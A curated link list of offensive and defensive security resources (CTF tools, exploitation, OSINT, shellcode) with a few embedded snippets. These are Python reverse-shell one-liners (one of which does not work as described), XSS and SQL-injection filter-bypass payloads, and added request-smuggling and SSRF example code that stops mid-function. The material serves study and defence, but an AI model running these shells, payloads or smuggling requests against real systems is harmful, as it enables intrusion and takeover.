- RsaCtfTool: RSA attack tool (mainly for CTF) - retrieve the private key from a weak public key and/or decipher data
- BalsnCTF-2019 by CykuTW
- HackTheBox CTF Cheatsheet: This cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box labs on the basis of operating system and difficulty.
- Mumbai:1 Vulnhub Walkthrough
- 0x0G 2020 CTF
- FIRST SecLounge CTF 2020 Solutions
- Hitcon2017CTF - 家徒四壁
- Everlasting Imaginative Void - r2dec
- SASatHome
- CTFs-Exploits
- nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
- thg-framework
- Super-Guesser-ctf
- Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
- ARM LAB ENVIRONMENT
- Azure IoT HUB
- A collection of vulnerable ARM binaries for practicing exploit development
- ARM VM working out of the box for everyone
- Statically compiled ARM binaries for debugging and runtime analysis.
- Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> rosenbridge: Hardware backdoors in some x86 CPUs
- USBHarpoon Is a BadUSB Attack with A Twist
- Ground Zero: Part 3-2 Patching Binaries with Radare2 - ARM64
- A 2018 practical guide to hacking RFID/NFC
- riscv-ida: RISC-V ISA processor module for IDAPro 7.x
- mac-age: MAC address age tracking
- OpenWRT on Mikrotik Routerboard 750
- Lexra: Lexra implemented a 32-bit variant of the MIPS architecture.
- IntelTEX-PoC: Intel Management Engine JTAG Proof of Concept
- me_cleaner: Tool for partial deblobbing of Intel ME/TXE firmware images.
- Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
- me_removal: Testing complete ME removal on Intel HEDT systems
- IDA-scripts: IDAPro scripts/plugins
- Something about IR optimization: Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
- Dragonblood: Analysing WPA3's Dragonfly Handshake
- The Hacker's Hardware Toolkit: The best hacker's gadgets for Red Team pentesters and security researchers.
- Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around $100.
- Extracting seed from Ellipal wallet
- Breaking Trezor One with Side Channel Attacks: A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
- Rewriting Functions in Compiled Binaries
- eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
- Deep Dive: Machine Check Error Avoidance on Page Size Change.
- Saleae: Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits. downloads
- wacker: A WPA3 dictionary cracker.
- Wifi-Ducky-ESPUSB
- USB Attacks: Past, Present and Future, P4wnP1 Covert Channel demo - P4wnP1 is listed below in the pentesting section. wrap-up here
- PLATYPUS: With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs.
- VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
- Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I
- Arm Heap Exploitation, by Azeria:
- AZM Online Arm Assembler
- Part 1: Understanding the Glibc Heap Implementation
- Part 2: Understanding the GLIBC Heap Implementation
- Heap Exploit Development - Case study from an in-the-wild iOS 0-day. thread
- ARM64 Reversing and Exploitation by prateekg147:
- Part 1 - ARM Instruction Set + Simple Heap Overflow
- Part 2 - Use After Free
- Part 3 - A Simple ROP Chain
- Seclists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
- Search operating systems on the network: osquery
- osquery Across the Enterprise
- fleet: The premier osquery fleet manager.
- Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection
- Zero Day Zen Garden:
- Got Meterpreter? PivotPowPY!
- Pentest Tips and Tricks
- Script to steal passwords from ssh.
- Network Infrastructure Penetration Testing Tool
- tcp connection hijacker
- "EAST" PENTEST FRAMEWORK
- Pown.js: is the security testing and exploitation framework built on top of Node.js and NPM.
- Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine.
- trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
- TIDoS-Framework: The offensive web application penetration testing framework.
- GitMiner: Tool for advanced mining for content on Github
- DHCPwn: All your IPs are belong to us.
- badKarma: advanced network reconnaissance toolkit.
- Danger-zone: Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
- go-tomcat-mgmt-scanner: A simple scanner to find and brute force tomcat manager logins
- IoTSecurity101: From IoT Pentesting to IoT Security
- IoT Pentesting and IoT-PT: A Virtual environment for Pentesting IoT Devices
- red_team_telemetry
- SharpSploitConsole: SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
- CrackMapExec: A swiss army knife for pentesting networks
- DarkSpiritz: A penetration testing framework for Linux, MacOS, and Windows systems.
- proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. Built by the community during a hackathon at the WWHF 2018 security conference.
- PentestHardware: Kinda useful notes collated together publicly
- MarkBaggett’s gists: This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
- Serverless Toolkit for Pentesters
- pentest_scripts: scrapes LinkedIn and generates an email list.
- Penetration Testing Tools Cheat Sheet: a quick reference cheat sheet providing a high level overview of the typical commands you would run during a penetration testing engagement.
- shellver: Reverse Shell Cheat Sheet TooL
- IVRE: Network recon framework (github).
- (pt-br) DomainInformation: Tool for identifying files, folders, DNS servers and e-mail. It attempts a zone transfer, searches for subdomains and, finally, looks for open ports on each IP of the subdomains. Enjoy =)
- GTRS: GTRS - Google Translator Reverse Shell
- Spawning a TTY Shell: Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system.
- LeakLooker: Find Open Databases in Seconds. github
- pown-recon: A powerful target reconnaissance framework powered by graph theory.
- Micro8: The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-testing, network security enthusiasts, etc., and for enterprise security protection and improvement; the series follows the principles: free, shared, open source.
- Payloads All The Things: A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!
- Penetration Test Guide based on the OWASP + Extra: This guide is for penetration testers seeking the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view into 9 Test Classes, and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests, which is also useful for the report document. I've also added 15 extra Test Cases marked by EXTRA-TEST. I hope it will be useful in both penetration test projects and bug bounties.
- Insecure Direct Object References (OTG-AUTHZ-004)
- OWASP ZAP w2019-10-14 released: pentesting tool for finding vulnerabilities in web applications.
- Order of the Overflow Proxy Service
- liffy: Local file inclusion exploitation tool
- foxyproxy.json: Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter
- pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios.
- Linux for Pentester: ZIP Privilege Escalation
- Presentation Clickers: Keystroke injection vulnerabilities in wireless presentation clickers.
- postwoman: alien API request builder - A free, fast, and beautiful alternative to Postman.
- Better API Penetration Testing with Postman:
- DNS and DHCP Recon using Powershell
- SiteBroker: A cross-platform python based utility for information gathering and penetration testing automation!
- PENTESTING-BIBLE: This repository was created and developed by Ammar Amer (@cry__pto) only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 PDF files. Learn ethical hacking and penetration testing: hundreds of ethical hacking, penetration testing, red team, cyber security & computer science resources.
- Nikto web server scanner.
- NetAss2: Network Assessment Assistance Framework.
- CSS Injection Primitives
- physical-docs: This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments.
- pentest-tools: Custom pentesting tools.
- HACKING WITH ENVIRONMENT VARIABLES: Interesting environment variables to supply to scripting language interpreters
- rootend: A *nix Enumerator & Auto Privilege Escalation tool.
- DroneSploit: Drone pentesting framework console.
- HackTricks (Pentesting Methodology): Here you will find the typical flow that you should follow when pentesting one or more machines.
- Huawei_Thief: Huawei DG8045 & HG633 Devices Exploitation Tool
- urldozer: Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]).
- Pentesting Cheatsheets
- Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )
- Several ways to download and execute malicious codes (LOLBAS)
- Jok3r: Network and Web Pentest Automation Framework. site
- Penetration Testing Cheat Sheet
- BBT- Bug Bounty Tools
- P4wnP1 A.L.O.A. by MaMe82 is a framework which turns a Raspberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance".
- AriaCloud: A Docker container for remote penetration testing.
- RustScan: The Modern Day Port Scanner.
- Impacket: is a collection of Python classes for working with network protocols.
- fiddler: Capturing web traffic logs
- SecLists: is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
- 21 - Pentesting FTP
- PwnWiki.io is a collection of TTPs (tools, tactics, and procedures) for what to do after access has been gained. The notes section of the pentester's mind.
- post-exploitation: Post Exploitation Collection.
- Proxyjump, the SSH option you probably never heard of
- GLORP: A CLI-based HTTP intercept and replay proxy
- Sec4US's cheatsheets: a lot of cheatsheets about shellcoding and bufferoverflow.
- Pentesting 101: Working With Exploits
- SMB AutoRelay: SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.
- Decoder++: An extensible application for penetration testers and software developers to decode/encode data into various formats.
- SCShell: Fileless lateral movement tool that relies on ChangeServiceConfigA to run command.
- bulwark: An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.
- Automated Reconnaissance Pipeline: An automated target reconnaissance pipeline.
- PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
- subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
- urlhunter: a recon tool that allows searching on URLs that are exposed via shortener services
- linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
- Ethical Hacking Course: Enumeration Theory
- Sublist3r: Fast subdomains enumeration tool for penetration testers
- subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
- massh-enum: OpenSSH 7.x Mass Username Enumeration.
- LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
- linpostexp: Linux post exploitation enumeration and exploit checking tools
- Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
- The art of subdomain enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration".
- social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
- LEGION - Automatic Enumeration Tool
- discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
- Z/OS System Enumeration Scripts: PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
- WPExploitation: simple scripts to help with Windows enumeration.
- CTFR uses neither dictionary attacks nor brute force; it just abuses Certificate Transparency logs.
- feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
- grinder: Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
- Admin-Scanner: This tool is designed to find the admin panel of websites.
- the-art-of-subdomain-enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration"
- Virtual host scanner: A script to enumerate virtual hosts on a server.
- vhost-brute: A PHP tool to brute force vhosts configured on a server.
- grab_beacon_config: nmap script to get beacon info.
- assetfinder: Find domains and subdomains related to a given domain.
- Wordlists:
- hackerone_wordlist: The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
- paths wordlists
- subdomains wordlists
- parameters wordlists
- Assetnote Wordlists
- novahot: A webshell framework for penetration testers.
- Weevely: Weaponized web shell
- Did you know that Python's simple web server can run CGI scripts
- Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM.
- shellcode2asmjs: Automatically generate ASM.JS JIT-Spray payloads
- Shellen: Interactive shellcoding environment to easily craft shellcodes
- C-S1lentProcess1njector: Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage.
- Windows:
- Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.
- pe_to_shellcode: Converts PE into a shellcode
- stager.dll: Code from this article
- ThreadBoat: Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
- Excel4-DCOM: PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe).
- MaliciousMacroMSBuild: Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
- Linux:
- Linux x86 Reverse Shell Shellcode
- mem-loader.asm: Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by x-c3ll)
- Shellab: Linux and Windows shellcode enrichment utility
- ShellcodeWrapper: Shellcode wrapper with encryption for multiple target languages
- I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch): `nc -lnvp 1234` / `python3 -c '__import__("subprocess").Popen("sh",0,None,*[__import__("socket").create_connection(("127.0.0.1",1234))]*3)'` (107, single statement, non-blocking) or `python3 -c 'import subprocess as S,socket;S.run("sh",0,None,*[socket.create_connection(("127.0.0.1",1234))]*3)'` (98, separators, blocking)
- python-pty-shells: Python PTY backdoors - full PTY or nothing!
- Powershell HTTP/S Reverse Shell: Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware.
- New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
- Reverse Shell Cheat Sheet
- Reverse Shell Generator repo
- USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
- (pt-br) Usando a pwntools para Binary Exploitation
- CallObfuscator: Obfuscate specific windows apis with different apis
- public-pentesting-reports: Curated list of public penetration test reports released by several consulting firms and academic security groups
- report-ng: Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
- PandocPentestReport: This repository shows my effort to create a pandoc based pentest report template.
- Technical Report template: LaTeX template for technical reports
- TryHackMe. Breaking Into the Kenobi Machine.
- PwnDoc: PwnDoc is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report.
- Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
- OSINT tool for visualizing relationships between domains, IPs and email addresses.
- sn0int: Semi-automatic OSINT framework and package manager
- A Pentester’s Guide – Part 1: OSINT – Passive Recon and Discovery of Assets
- A Pentester’s Guide - Part 2: OSINT – LinkedIn is Not Just for Jobs
- iKy: I Know You (OSINT project)
- Gitrob: Putting the Open Source in OSINT
- OSINT Tools: On this page you'll find tools that can help with your OSINT research.
- datasploit: An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.
- the-endorser: An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills.
- OSINT-y Goodness: HathiTrust Digital Library
- OSINT Resources for 2019
- Awesome OSINT: 😱 A curated list of amazingly awesome OSINT
- OSINT-y Goodness, №14 - Directory of Open Access Journals
- Twitter Analysis: Identifying A Pro-Indonesian Propaganda Bot Network
- TWINT: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.
- Breaking Mimblewimble's Privacy Model: Mimblewimble's privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% of Grin transactions in real time.
- snscrape: A social networking service scraper in Python
- Hack the planet with ꓘamerka GUI — Ultimate Internet of Things/Industrial Control Systems reconnaissance tool. twitter announcement, github. ICS/IoT search: ꓘamerka. Kamerka OSINT tool shows your country's internet-connected critical infrastructure
- dmi-tcat/Digital Methods Initiative - Twitter Capture and Analysis Toolset.
- KnockKnock: A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes.
- From email to phone number, a new OSINT approach
- recox: Master script for web reconnaissance
- openSquat is an open source intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams.
- Trace Labs Kali Linux build configuration: Trace Labs OSINT Linux Distribution based on Kali.
- natlas: Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned.
- sifter: an OSINT, recon & vulnerability scanner. It combines a plethora of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within Microsoft products and, if unpatched, exploit them.
- Kitsune: An artificial neural network to detect automated Twitter accounts (bots).
- OSINT framework focused on gathering information from free tools or resources.
- h8mail: Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
- PwnBin: Python Pastebin Webcrawler that returns list of public pastebins containing keywords
- ODBParser: OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.
- pastego: Scrape/Parse Pastebin using GO and expression grammar (PEG)
- chatter: internet monitoring osint telegram bot for windows
- Slackhound: Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
- Striker is an offensive information and vulnerability scanner
- SQL Vulnerability Scanner
- Decentralized Application Security Project, github
- BLEAH: A BLE scanner for "smart" devices hacking.
- Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
- Beating the OWASP Benchmark
- CMSScan: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues.
- Meteor Blind NoSQL Injection
- Security Bulletins that relate to Netflix Open Source
- tsunami-security-scanner: Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
- Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners, repo
- New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service. NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website
- openVulnQuery: A Python-based client for the Cisco openVuln API
- Web Application Penetration Testing Course URLs
- Web Application Penetration Testing Notes
- quarantyne: Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
- Sitadel: Web Application Security Scanner.
- WAF through the eyes of hackers
- Some nice payloads to bypass XSS and SQL injection WAF filters (the split `jav` / `ascript` lines are the same payload with an embedded whitespace character, such as a tab or newline, inside the word javascript):
```
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
```
- Bypassing modern web application firewalls
- WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
- Bypassing Cloudflare WAF with the origin server IP address
- IOSurface exploit
- Attacking a co-hosted VM: A hacker, a hammer and two memory modules
- How To Create a Metasploit Module
- Installing Metasploit Pro, Ultimate, Express, and Community
- unfurl, An Entropy-Based Link Vulnerability Analysis Tool
- A collection of vulnerable ARM binaries for practicing exploit development
- A collection of PHP exploit scripts
- Sage ACF Blocks: A Sage 10 helper package for building ACF blocks rendered using blade templates.
- WebKit exploit
- Modern Binary Exploitation - Spring 2015
- (video) Python 2 vs 3 for Binary Exploitation Scripts
- DriveCrypt: DriveCrypt Dcr.sys vulnerability exploit
- Faxploit: Sending Fax Back to the Dark Ages
- beebug: A tool for checking exploitability
- NAVEX: Precise and scalable exploit generation for dynamic web applications
- Three New DDE Obfuscation Methods
- SILENTTRINITY: A post-exploitation agent powered by Python, IronPython, C#/.NET
- fuxploider: File upload vulnerability scanner and exploitation tool.
- Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff.
- Attacking Google Authenticator
- Pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments. installation guide, starting guide
- Glibc Heap Exploitation Basics:
- Introduction to ptmalloc2 internals (Part 1)
- ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
- movfuscator: The single instruction C compiler
- UEFI vulnerabilities classification focused on BIOS implant delivery and What makes OS drivers dangerous for BIOS?
- MikroTik Firewall & NAT Bypass
- 3D Accelerated Exploitation: The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
- GhostDelivery: Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions.
- Beat the hole in the ATM: hacking a Diebold ATM.
- RedGhost: Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
- PowerSploit: is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- Z-Shave. Exploiting Z-Wave downgrade attacks
- Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
- I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃: python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
- The Art of WebKit Exploitation
- PEASS: Privilege Escalation Awesome Scripts SUITE.
- Patchless AMSI bypass using SharpBlock
- Lets Create An EDR… And Bypass It! Part 1
- Lets Create An EDR… And Bypass It! Part 2
- SharpBlock: A method of bypassing EDRs' active protection DLLs by preventing entry point execution. SylantStrike: Simple EDR implementation to demonstrate bypass.
- Bypassing Antivirus with Golang – Gopher it!
- The Invoke-CradleCrafter Overview
- DVS: D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects.
- The Exploit Database Git Repository
- Vulnerability Lab: an independent bug bounty hacker community; the pitch is to leverage researchers' skills and creativity to surface your critical vulnerabilities before criminals can exploit them.
- 0day.Today: Biggest Exploits Database and 0day market. The Underground is one of the world's most popular and comprehensive computer security web sites.
- cxsecurity: is an open project developed and moderated fully by one independent person.
- Security Focus
- packet storm: Exploit Files
- Graphology of an Exploit: Hunting for exploits by looking for the author’s fingerprints
- Traditional Buffer Overflow Windows cheatsheet
- Exploit writing tutorial part 3 : SEH Based Exploits
- Vulnerability DB: Detailed information and remediation guidance for known vulnerabilities.
- mssqlproxy: a toolkit for lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse.
- bbrecon: Python library and CLI for the Bug Bounty Recon API
- RPC Bug Hunting Case Studies – Part 1
- Top Penetration Testing & Bug Hunting YouTube Channels you should follow - Updated 11/19/2020
- Our top tips for better bug bounty reports, plus a hacker contest!
- axiom: The dynamic infrastructure framework for anybody!
- gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- get-title
- Insecure Direct Object References
- bugbounty-cheatsheet: A list of interesting payloads, tips and tricks for bug bounty hunters.
- Awesome Bug Bounty: A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
- ParamSpider: Mining parameters from dark corners of Web Archives.
- SQLi
- Server Side Request Forgery
- CRLF
- CRLF Injection
- CSV-Injection
- CSV Injection
- Command Injection
- Directory Traversal
- LFI
- File Inclusion
- Open-Redirect
- RCE
- Crypto
- Template Injection
- SSTI
- XSLT
- Content Injection
- LDAP Injection
- NoSQL Injection
- GraphQL Injection
- IDOR
- ISCM
- OAuth
- XPATH Injection
- Bypass Upload Tricky
- CSRF:
- HTTP Request Smuggling:
- Practical Attacks Using HTTP Request Smuggling slides
- HAProxy HTTP request smuggling (CVE-2019-18277)
- The Powerful HTTP Request Smuggling
- Smuggler: An HTTP Request Smuggling / Desync testing tool written in Python 3
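Added example, not taken from the talks or the Smuggler tool above: a Python model of the CL.TE desync. One function frames a request the way a front end trusting Content-Length does, another the way a back end trusting Transfer-Encoding: chunked does, and the difference becomes the prefix of the next request on the same back-end connection. The request bytes and host names are constructed.

```python
CRLF = b"\r\n"

# Constructed CL.TE probe: Content-Length covers the whole body, but a chunked parser stops
# at the "0" chunk, so everything after it is left in the back end's buffer.
SMUGGLED = b"GET /admin HTTP/1.1\r\nFoo: x"          # deliberately unterminated header
ATTACKER_REQUEST = b"".join([
    b"POST / HTTP/1.1\r\n",
    b"Host: vulnerable.example\r\n",
    b"Content-Length: %d\r\n" % (5 + len(SMUGGLED)),   # 5 == len(b"0\r\n\r\n")
    b"Transfer-Encoding: chunked\r\n",
    b"\r\n",
    b"0\r\n\r\n",
    SMUGGLED,
])
VICTIM_REQUEST = (b"GET /home HTTP/1.1\r\nHost: vulnerable.example\r\n"
                  b"Cookie: session=victim\r\n\r\n")

def parse_head(raw):
    """Split a raw request into (request line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, body

def frame_by_content_length(raw):
    """Framing of a front end that honours Content-Length: (body, bytes left for the next request)."""
    _, headers, body = parse_head(raw)
    n = int(headers.get("content-length", "0"))
    return body[:n], body[n:]

def frame_by_chunked(raw):
    """Framing of a back end that honours Transfer-Encoding: chunked."""
    _, headers, body = parse_head(raw)
    if "chunked" not in headers.get("transfer-encoding", "").lower():
        raise ValueError("request is not chunked")
    pos, data = 0, b""
    while True:                                   # chunk-size CRLF chunk-data CRLF ... until size 0
        end = body.index(CRLF, pos)
        size = int(body[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            break
        data += body[pos:pos + size]
        pos += size + 2
    while True:                                   # optional trailers, then an empty line
        end = body.index(CRLF, pos)
        if end == pos:
            pos += 2
            break
        pos = end + 2
    return data, body[pos:]

def ambiguous_framing(raw):
    """The check a proxy should make before forwarding: refuse a request that carries both
    length headers, or a Transfer-Encoding it cannot parse exactly as 'chunked'."""
    _, headers, _ = parse_head(raw)
    te = headers.get("transfer-encoding")
    return te is not None and ("content-length" in headers or te.strip().lower() != "chunked")

def cl_te_desync(attacker_raw, victim_raw):
    """The next request as the back end parses it after the attacker's request went through."""
    _, forwarded_rest = frame_by_content_length(attacker_raw)
    if forwarded_rest:
        raise ValueError("front end would have seen two requests, not a CL.TE case")
    _, leftover = frame_by_chunked(attacker_raw)   # what the back end did not consume
    request_line, headers, _ = parse_head(leftover + victim_raw)
    return request_line, headers

if __name__ == "__main__":
    line, hdrs = cl_te_desync(ATTACKER_REQUEST, VICTIM_REQUEST)
    print(line)   # GET /admin HTTP/1.1: the victim's own request line became the Foo header value
    print(hdrs)
```

The victim's request line ends up as the value of the smuggled `Foo:` header, while the victim's cookies are delivered to `/admin`. The TE.CL variant is the mirror image (swap which side trusts which header); in both cases the fix is the `ambiguous_framing` refusal at the front end, normalising to a single framing before forwarding, or HTTP/2 end to end.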
- XSS:
- SSRF:
- SSRF
- SSRF Tips: some tips with Server Side Request Forgery.
- Server Side Request Forgery on MISP: CVE-2020-28043
- SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
- Unauthenticated Full-Read SSRF in Grafana: CVE-2020-13379
- Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
- Gf-Patterns: GF patterns for grepping parameters of interest (ssrf, RCE, LFI, sqli, ssti, idor, url redirection, debug_logic, interesting subs)
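Added example (not from the SSRF write-ups above): a Python allow-list check in its naive and hardened forms, covering the bypasses those reports rely on (userinfo tricks, look-alike hosts, the 169.254.169.254 metadata address in decimal, hex and IPv4-mapped IPv6 form, and a rebinding name). The allow-list, the resolver table `FAKE_DNS` and the addresses are hypothetical; the hardened check judges the resolved addresses rather than the URL string.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.example.com"}      # hypothetical allow-list for a webhook/fetch feature

# Hypothetical offline resolver standing in for DNS. A real implementation must resolve with
# the same resolver the HTTP client uses and connect to the address it checked; otherwise a
# rebinding domain answers with a public address first and 127.0.0.1 on the next lookup.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "api.example.com.attacker.net": ["1.2.3.4"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.attacker.net": ["1.2.3.4", "127.0.0.1"],
}

def naive_is_allowed(url):
    """The check that looks right and is not: a prefix match on the string."""
    return url.startswith("https://api.example.com")

def ip_literal(host):
    """Address forms an HTTP client accepts: dotted quad, IPv6 (with or without []),
    and the inet_aton-style decimal/hex forms such as 2852039166 or 0xa9fea9fe."""
    host = host.strip("[]")
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))   # int(..., 0) does not accept "0123"-style octal
    except ValueError:
        return None

def resolve(host):
    literal = ip_literal(host)
    if literal is not None:
        return [literal]
    return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])]

def is_internal(ip):
    """Loopback, RFC 1918, link-local (169.254.169.254 lives here), CGNAT, reserved..."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                         # ::ffff:169.254.169.254 is the v4 address in disguise
    return not ip.is_global

def hardened_is_allowed(url, allow_hosts=None):
    """Parse the URL, reject odd schemes and userinfo tricks, then judge the *resolved*
    addresses, not the string. Must be re-run on every redirect the client follows."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:   # https://api.example.com@evil/
        return False
    host = parts.hostname
    if not host:
        return False
    if allow_hosts is not None and host not in allow_hosts:
        return False
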